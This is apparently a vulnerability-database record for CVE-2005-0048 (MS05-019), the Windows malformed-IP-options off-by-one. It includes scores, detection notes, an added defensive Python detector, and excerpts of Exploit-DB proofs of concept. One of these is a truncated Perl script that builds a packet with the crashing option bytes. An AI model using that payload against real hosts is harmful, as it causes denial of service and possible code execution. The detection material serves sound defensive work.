CVE-2005-0048
Published 2005-05-02
Priority P3 · 46 · high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available
EPSS 45.52% (98.6th percentile)
Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability."
Detection & IOCs (extracted from sources)
- IP options field: option byte + size byte 0x27 (39) + 38 bytes of payload.
- Look for IPv4 TCP SYN packets with a 60-byte IP header (ip_hl=15, i.e. the maximum 40 bytes of IP options) sent to arbitrary destination ports; this is the characteristic traffic pattern of the PoC exploit.
- The exploit sends the malformed packet 5 times in rapid succession to the target; repeated identical malformed-options packets from the same source may indicate exploitation attempts.
- The immediate observable consequence of exploitation is a denial of service (crash), though remote code execution has been reported as a potential outcome.
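The following Python is an added example, not code from this record or from the Exploit-DB PoC it lists. It turns the detection notes above into a check a packet parser can run offline: it walks the RFC 791 options list of a raw IPv4 header, reports an options field whose declared lengths do not fit the space ip_hl allows, and only then tests for the specific PoC shape (ip_hl=15, TCP SYN, an option claiming 39 of the 40 option bytes). It also counts identical malformed packets per source, since the PoC repeats the packet 5 times. All packets, addresses (RFC 5737 documentation ranges) and helper names are constructed here; nothing is transmitted. The Record Route sample shows the caveat a practitioner needs: a valid 40-byte options field can legitimately carry a length-39 option followed by End-of-Option-List, so header length and option length alone are not a signature, the trailing byte that cannot be parsed is.

```python
"""Detector for internally inconsistent IPv4 options (the MS05-019 pattern).

Added example, not code from the page or from the Exploit-DB PoC. Input is the
raw IPv4 header plus payload (no link layer); all sample packets are constructed
in memory below and nothing is transmitted.
"""
import struct
from collections import Counter

TCP = 6


def build_ipv4(options: bytes, payload: bytes, src="192.0.2.10", dst="192.0.2.20") -> bytes:
    """Constructed IPv4/TCP packet with the given options (header checksum left at 0)."""
    options += b"\x00" * (-len(options) % 4)          # options are padded to 32 bits
    ihl = 5 + len(options) // 4                       # header length in 32-bit words
    if ihl > 15:
        raise ValueError("IPv4 options cannot exceed 40 bytes")
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4 + len(payload),
                      0x1234, 0, 64, TCP, 0,
                      bytes(int(o) for o in src.split(".")),
                      bytes(int(o) for o in dst.split(".")))
    return hdr + options + payload


def tcp_syn(dport: int) -> bytes:
    """Constructed 20-byte TCP header with only the SYN flag set."""
    return struct.pack("!HHIIBBHHH", 40000, dport, 1, 0, 5 << 4, 0x02, 8192, 0, 0)


def walk_options(opts: bytes):
    """Walk the RFC 791 options list; return (parsed (type, length) pairs, error or None)."""
    seen, i = [], 0
    while i < len(opts):
        t = opts[i]
        if t == 0:                                    # End of Option List: rest is padding
            break
        if t == 1:                                    # No Operation: one byte, no length
            i += 1
            continue
        if i + 1 >= len(opts):
            return seen, f"option {t:#04x} at offset {i} has no length byte"
        ln = opts[i + 1]
        if ln < 2 or i + ln > len(opts):
            return seen, f"option {t:#04x} declares length {ln} with {len(opts) - i} bytes left"
        seen.append((t, ln))
        i += ln
    return seen, None


def classify(pkt: bytes) -> dict:
    """Return source, header length, raw options and detection findings for one packet."""
    hlen = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    src = ".".join(str(b) for b in pkt[12:16])
    opts, payload = pkt[20:hlen], pkt[hlen:]
    seen, err = walk_options(opts)
    findings = []
    if err:
        findings.append("malformed IP options: " + err)
        # The published PoC: ip_hl=15, a TCP SYN, one option claiming 39 of the 40 option bytes.
        syn_only = proto == TCP and len(payload) >= 14 and (payload[13] & 0x3F) == 0x02
        if hlen == 60 and syn_only and any(ln == 39 for _, ln in seen):
            findings.append("matches MS05-019 PoC pattern (ip_hl=15, TCP SYN, option length 0x27)")
    return {"src": src, "hlen": hlen, "options": opts, "findings": findings}


def repeated_offenders(packets, threshold=5):
    """Sources that sent `threshold` or more packets with identical malformed options."""
    counts = Counter()
    for pkt in packets:
        r = classify(pkt)
        if r["findings"]:
            counts[(r["src"], r["options"])] += 1
    return sorted({src for (src, _), n in counts.items() if n >= threshold})


# Constructed option fields (not captured traffic)
POC_OPTIONS = b"\x03\x27" + b"G" * 38                      # as in the PoC: type 3, length 39, 38 more bytes
RR_OPTIONS = b"\x07\x27\x04" + b"\x00" * 36 + b"\x00"     # valid Record Route of length 39, then EOOL
SHORT_OPTIONS = b"\x83\x09\x04"                             # LSRR claiming 9 bytes in a 4-byte field

if __name__ == "__main__":
    samples = ([build_ipv4(b"", tcp_syn(80)), build_ipv4(RR_OPTIONS, tcp_syn(80)),
                build_ipv4(SHORT_OPTIONS, tcp_syn(80), src="192.0.2.30")]
               + [build_ipv4(POC_OPTIONS, tcp_syn(80))] * 5)
    for pkt in samples:
        r = classify(pkt)
        print(r["src"], r["hlen"], r["findings"] or "ok")
    print("repeated offenders:", repeated_offenders(samples))
```

Feeding `classify` the IPv4 layer of each packet from a capture gives the generic "malformed IP options" finding for any length-inconsistent options list, while the second finding narrows to the shape of this particular PoC; `repeated_offenders` implements the repeated-identical-packet heuristic from the notes above with the PoC's count of 5 as the default threshold.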
No detection rules found.
Exploit-DB: Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)
exploitdb · 2005-04-17 · CVE-2005-0688
---
/* ecl-winipdos.c - 16/04/05
* Yuri Gushin
* Alex Behar
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are already used:
* [ OPT ] [ SIZE ] [ 38 more bytes ]
* Checks are done to validate that the option-size field is less than
* 40, where a value less than !39! should be checked for validation.
*
 * Note that this doesn't affect ALL options, and is also dependent upon
* the underlying protocol.
* Anyways, a small PoC to see how it works and why, tweak test and
* explore, have fun :)
*
*
* Greets fly out
Exploit-DB: Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
exploitdb · 2005-04-16 · CVE-2005-0048
---
// source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
Exploit-DB: Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
exploitdb · 2005-04-12 · CVE-2005-0048
---
source: https://www.securityfocus.com/bid/13116/info
#!/usr/bin/perl
use strict;
use warnings;
my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};
use Net::Pkt;
$Env->debug(3);
my $frame = Net::Packet::Frame->new(
l3 => Net::Packet::IPv4->new(
dst => $opts{t},
options => "\x03\x27". 'G'x38,
),
l4 => Net::Pack
No writeups or analysis indexed.
References
- http://www.kb.cert.org/vuls/id/233754
- http://www.us-cert.gov/cas/techalerts/TA05-102A.html
- http://xforce.iss.net/xforce/alerts/id/192
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-019
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1744
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3824
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4549